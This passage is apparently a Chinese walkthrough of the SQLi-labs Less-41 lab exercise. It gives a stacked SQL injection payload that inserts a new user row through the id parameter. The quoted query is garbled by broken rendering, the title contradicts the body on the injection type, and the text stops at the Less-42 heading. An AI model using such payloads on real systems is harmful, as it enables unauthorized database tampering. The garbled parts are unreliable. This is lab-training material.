Less-41 基于错误的POST型单引号字符型注入
与之前讲的Less-40的区别:
s q l = " S E L E C T ∗ F R O M u s e r s W H E R E i d = sql="SELECT * FROM users WHERE id= sql="SELECT∗FROMusersWHEREid=id LIMIT 0,1"; |
|
|
|
当然,和Less-40一样,都是盲注,不会显示错误信息,不过对我们没差,构建payload:
?id=1;insert into users(id,username,password) values(15,'jack','jack')%23
Less-42
分析源码可以知道: